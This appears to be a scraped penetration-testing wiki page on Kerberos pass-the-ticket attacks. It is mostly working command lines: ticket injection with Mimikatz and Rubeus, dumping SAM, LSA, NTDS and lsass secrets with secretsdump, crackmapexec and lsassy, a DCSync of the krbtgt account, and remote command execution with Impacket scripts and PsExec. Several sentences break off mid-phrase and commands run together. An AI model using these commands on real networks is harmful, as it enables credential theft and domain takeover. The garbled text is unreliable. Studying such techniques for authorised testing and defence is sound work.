Overpass-the-hash, silver ticket and golden ticket attacks are used by attackers to obtain illegitimate tickets. A ticket (TGT or service ticket, forged or not) can then be used to authenticate to a system using Kerberos without knowing any password. This is called Pass-the-ticket.
On UNIX-like systems, the path to the
.ccache ticket to use has to be referenced in the environment variable
Once a ticket is obtained/created, it needs to be referenced in the
KRB5CCNAME environment variable for it to be used by others tools.
# use a .kirbi filekerberos::ptt $ticket_kirbi_file# use a .ccache filekerberos::ptt $ticket_ccache_file
Rubeus.exe ptt /ticket:$ticket_kirbi_file
It is then possible to list the tickets in memory using the
On Windows, once Kerberos tickets are injected, they can be used natively.
On UNIX-like systems, once the
KRB5CCNAME variable is exported, the ticket can be used by tools that support Kerberos authentication.
secretsdump.py -k $TARGET
crackmapexec smb $TARGETS -k --samcrackmapexec smb $TARGETS -k --lsacrackmapexec smb $TARGETS -k --ntds
Lsassy (Python) has the ability to do it with higher success probabilities as it offers multiple dumping methods. This tool can set targets as "owned" in BloodHound. It works in standalone but also as a CrackMapExec module (see dumping credentials from lsass process memory).
crackmapexec smb $TARGETS -k -M lsassycrackmapexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rdlsassy -k $TARGETS
On Windows, once the ticket is injected, it will natively be used when accessing a service, for example with Mimikatz to extract the
lsadump::dcsync /dc:$DomainController /domain:$DOMAIN /user:krbtgt
Some Impacket scripts (Python) enable testers to execute commands on target systems with Kerberos support.
psexec.py -k 'DOMAIN/USER@TARGET'smbexec.py -k 'DOMAIN/USER@TARGET'wmiexec.py -k 'DOMAIN/USER@TARGET'atexec.py -k 'DOMAIN/USER@TARGET'dcomexec.py -k 'DOMAIN/USER@TARGET'
CrackMapExec (Python) has the ability to do it on a set of targets
crackmapexec winrm $TARGETS -k -x whoamicrackmapexec smb $TARGETS -k -x whoami
.\PsExec.exe -accepteula \\$TARGET cmd